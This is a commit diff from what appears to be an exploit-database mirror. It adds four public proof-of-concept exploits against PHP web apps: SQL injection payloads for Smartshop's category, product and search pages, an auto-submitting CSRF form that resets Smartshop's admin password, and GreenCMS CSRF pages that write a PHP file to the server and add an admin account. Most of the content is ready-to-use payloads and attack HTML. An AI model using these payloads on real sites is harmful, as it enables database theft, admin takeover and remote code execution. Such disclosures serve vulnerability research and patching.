DB: 2018-06-04
4 changes to exploits/shellcodes Smartshop 1 - 'id' SQL Injection Smartshop 1 - Cross-Site Request Forgery GreenCMS 2.3.0603 - Cross-Site Request Forgery / Remote Code Execution GreenCMS 2.3.0603 - Cross-Site Request Forgery (Add Admin)
This commit is contained in:
parent
22ba7ab5f3
commit
072457b6b8
5 changed files with 167 additions and 0 deletions
60
exploits/php/webapps/44823.txt
Normal file
60
exploits/php/webapps/44823.txt
Normal file
|
@ -0,0 +1,60 @@
|
||||||
|
# Exploit Title: Smartshop 1 - SQL Injection
|
||||||
|
# Date: 2018-06-02
|
||||||
|
# Exploit Author: L0RD or borna.nematzadeh123@gmail.com
|
||||||
|
# Software Link: https://github.com/smakosh/Smartshop/archive/master.zip
|
||||||
|
# Vendor Homepage: https://www.behance.net/gallery/49080415/Smartshop-Free-e-commerce-website
|
||||||
|
# Version: 1
|
||||||
|
# Tested on: Kali linux
|
||||||
|
=================================================
|
||||||
|
# Description :
|
||||||
|
Smartshop 1 suffers from sql injection which attacker can inject sql
|
||||||
|
commands .
|
||||||
|
=================================================
|
||||||
|
# POC : SQLi
|
||||||
|
|
||||||
|
# vulnerable files : [ category.php , product.php , search.php ]
|
||||||
|
|
||||||
|
1) category.php :
|
||||||
|
# Parameter : id
|
||||||
|
# Type : Union based
|
||||||
|
# Payload : ' UNION SELECT 1,user(),3,4,5%23
|
||||||
|
|
||||||
|
# Vulnerable code :
|
||||||
|
|
||||||
|
$id_category =$_GET['id'];
|
||||||
|
$start = ($page > 1) ? ($page * $perpage) - $perpage : 0;
|
||||||
|
$queryproduct = "SELECT SQL_CALC_FOUND_ROWS id, name, price, id_picture,
|
||||||
|
thumbnail FROM product WHERE id_category = '{$id_category}' ORDER BY id
|
||||||
|
DESC LIMIT {$start}, 16";
|
||||||
|
$result = $connection->query($queryproduct);
|
||||||
|
|
||||||
|
=================================================
|
||||||
|
|
||||||
|
2) product.php :
|
||||||
|
# Parameter : id
|
||||||
|
# Type : Union based
|
||||||
|
# Payload : ' UNION SELECT 1,user(),database(),4,5,6%23
|
||||||
|
|
||||||
|
# Vulnerable code :
|
||||||
|
|
||||||
|
$id_product =$_GET['id'];
|
||||||
|
$queryproduct = "SELECT id, name, price, description, id_picture, thumbnail
|
||||||
|
FROM product WHERE id = '{$id_product}'";
|
||||||
|
$result1 = $connection->query($queryproduct);
|
||||||
|
|
||||||
|
=================================================
|
||||||
|
|
||||||
|
3) search.php :
|
||||||
|
# Parameter : searched
|
||||||
|
# Type : Time-based blind
|
||||||
|
# Payload : ' AND SLEEP(10)%23
|
||||||
|
|
||||||
|
# Vulnerable code :
|
||||||
|
|
||||||
|
$word = $_GET['searched'];
|
||||||
|
$queryproduct = "SELECT SQL_CALC_FOUND_ROWS id, name, price, id_picture,
|
||||||
|
thumbnail FROM product WHERE name LIKE '%{$word}%' ORDER BY id DESC LIMIT
|
||||||
|
{$start}, 16";
|
||||||
|
$result = $connection->query($queryproduct);
|
||||||
|
|
||||||
|
=================================================
|
31
exploits/php/webapps/44824.html
Normal file
31
exploits/php/webapps/44824.html
Normal file
|
@ -0,0 +1,31 @@
|
||||||
|
# Exploit Title: Smartshop 1 - Cross site request forgery
|
||||||
|
# Date: 2018-06-02
|
||||||
|
# Exploit Author: L0RD or borna.nematzadeh123@gmail.com
|
||||||
|
# Software Link: https://github.com/smakosh/Smartshop/archive/master.zip
|
||||||
|
# Vendor Homepage: https://www.behance.net/gallery/49080415/Smartshop-Free-e-commerce-website
|
||||||
|
# Version: 1
|
||||||
|
# Tested on: Kali linux
|
||||||
|
=================================================
|
||||||
|
|
||||||
|
# POC : CSRF
|
||||||
|
|
||||||
|
# Exploit :
|
||||||
|
# vulnerable file : editprofile.php
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<title>Change admin password</title>
|
||||||
|
</head>
|
||||||
|
<body>
|
||||||
|
<form method="POST" action="http://127.0.0.1/clone/Smartshop-master/admin/editprofile.php">
|
||||||
|
<input type="hidden" name="email" value="decode@test.com">
|
||||||
|
<input type="hidden" name="password" value="1234">
|
||||||
|
<input type="hidden" name="confirmation" value="1234">
|
||||||
|
</form>
|
||||||
|
<script>
|
||||||
|
document.forms[0].submit();
|
||||||
|
</script>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
|
|
||||||
|
==================================================
|
33
exploits/php/webapps/44825.html
Normal file
33
exploits/php/webapps/44825.html
Normal file
|
@ -0,0 +1,33 @@
|
||||||
|
# Exploit Title: GreenCMS v2.3.0603 CSRF vulnerability get webshell
|
||||||
|
# Date: 2018-06-02
|
||||||
|
# Exploit Author: xichao
|
||||||
|
# Vendor Homepage: https://github.com/GreenCMS/GreenCMS
|
||||||
|
# Software Link: https://github.com/GreenCMS/GreenCMS
|
||||||
|
# Version: v2.3.0603
|
||||||
|
# CVE : CVE-2018-11670
|
||||||
|
|
||||||
|
An issue was discovered in GreenCMS v2.3.0603. There is a CSRF vulnerability that
|
||||||
|
allows attackers to execute arbitrary PHP code via the content parameter to index.php?m=admin&c=media&a=fileconnect.
|
||||||
|
|
||||||
|
poc:
|
||||||
|
|
||||||
|
<span style="font-size:18px;"><!DOCTYPE html>
|
||||||
|
<html lang="en">
|
||||||
|
<head>
|
||||||
|
<meta charset="UTF-8">
|
||||||
|
<title>csrftest</title>
|
||||||
|
</head>
|
||||||
|
<form action="http://127.0.0.1//14/index.php?m=admin&c=media&a=fileconnect" method="POST" id="transfer" name="transfer">
|
||||||
|
<script src="http://127.0.0.1/14/index.php?m=admin&c=media&a=fileconnect&cmd=mkfile&name=xc.php&target=l1_XA&_=1527839615462"></script>
|
||||||
|
<input type="hidden" name="cmd" value="put">
|
||||||
|
<input type="hidden" name="target" value="l1_eGMucGhw">
|
||||||
|
<input type="hidden" name="content" value="<?php phpinfo();?>">
|
||||||
|
<button type="submit" value="Submit">WebShell</button>
|
||||||
|
</form>
|
||||||
|
</body>
|
||||||
|
</html></span>
|
||||||
|
|
||||||
|
References:
|
||||||
|
http://www.iwantacve.cn/index.php/archives/38/
|
||||||
|
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11670
|
||||||
|
https://github.com/GreenCMS/GreenCMS/issues/108
|
39
exploits/php/webapps/44826.html
Normal file
39
exploits/php/webapps/44826.html
Normal file
|
@ -0,0 +1,39 @@
|
||||||
|
# Exploit Title: GreenCMS v2.3.0603 CSRF vulnerability add admin
|
||||||
|
# Date: 2018-06-02
|
||||||
|
# Exploit Author: xichao
|
||||||
|
# Vendor Homepage: https://github.com/GreenCMS/GreenCMS
|
||||||
|
# Software Link: https://github.com/GreenCMS/GreenCMS
|
||||||
|
# Version: v2.3.0603
|
||||||
|
# CVE : CVE-2018-11671
|
||||||
|
|
||||||
|
An issue was discovered in GreenCMS v2.3.0603. There is a CSRF vulnerability that can add an admin account via index.php?m=admin&c=access&a=adduserhandle.
|
||||||
|
|
||||||
|
poc:
|
||||||
|
|
||||||
|
<span style="font-size:18px;"><!DOCTYPE html>
|
||||||
|
<html lang="en">
|
||||||
|
<head>
|
||||||
|
<meta charset="UTF-8">
|
||||||
|
<title>csrftest</title>
|
||||||
|
</head>
|
||||||
|
<body>
|
||||||
|
<form action="http://127.0.0.1//14/index.php?m=admin&c=access&a=adduserhandle" method="POST" id="transfer" name="transfer">
|
||||||
|
<input type="hidden" name="user_id0" value="1">
|
||||||
|
<input type="hidden" name="user_login" value="test1">
|
||||||
|
<input type="hidden" name="password" value="test1">
|
||||||
|
<input type="hidden" name="rpassword" value="test1">
|
||||||
|
<input type="hidden" name="user_nicename" value="123">
|
||||||
|
<input type="hidden" name="user_email" value="123%40Qq.com">
|
||||||
|
<input type="hidden" name="user_url" value="www.baidu.com">
|
||||||
|
<input type="hidden" name="user_intro" value="test">
|
||||||
|
<input type="hidden" name="user_status" value="1">
|
||||||
|
<input type="hidden" name="role_id" value="1">
|
||||||
|
<button type="submit" value="Submit">add admin</button>
|
||||||
|
</form>
|
||||||
|
</body>
|
||||||
|
</html></span>
|
||||||
|
|
||||||
|
References:
|
||||||
|
http://www.iwantacve.cn/index.php/archives/39/
|
||||||
|
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11671
|
||||||
|
https://github.com/GreenCMS/GreenCMS/issues/109
|
|
@ -39487,3 +39487,7 @@ id,file,description,date,author,type,platform,port
|
||||||
44814,exploits/php/webapps/44814.txt,"PHP Dashboards NEW 5.5 - 'email' SQL Injection",2018-05-31,"Kağan Çapar",webapps,php,
|
44814,exploits/php/webapps/44814.txt,"PHP Dashboards NEW 5.5 - 'email' SQL Injection",2018-05-31,"Kağan Çapar",webapps,php,
|
||||||
44815,exploits/php/webapps/44815.txt,"CSV Import & Export 1.1.0 - SQL Injection / Cross-Site Scripting",2018-05-31,"Kağan Çapar",webapps,php,
|
44815,exploits/php/webapps/44815.txt,"CSV Import & Export 1.1.0 - SQL Injection / Cross-Site Scripting",2018-05-31,"Kağan Çapar",webapps,php,
|
||||||
44816,exploits/php/webapps/44816.txt,"Grid Pro Big Data 1.0 - SQL Injection",2018-05-31,"Kağan Çapar",webapps,php,
|
44816,exploits/php/webapps/44816.txt,"Grid Pro Big Data 1.0 - SQL Injection",2018-05-31,"Kağan Çapar",webapps,php,
|
||||||
|
44823,exploits/php/webapps/44823.txt,"Smartshop 1 - 'id' SQL Injection",2018-06-03,L0RD,webapps,php,
|
||||||
|
44824,exploits/php/webapps/44824.html,"Smartshop 1 - Cross-Site Request Forgery",2018-06-03,L0RD,webapps,php,
|
||||||
|
44825,exploits/php/webapps/44825.html,"GreenCMS 2.3.0603 - Cross-Site Request Forgery / Remote Code Execution",2018-06-03,longer,webapps,php,
|
||||||
|
44826,exploits/php/webapps/44826.html,"GreenCMS 2.3.0603 - Cross-Site Request Forgery (Add Admin)",2018-06-03,longer,webapps,php,
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue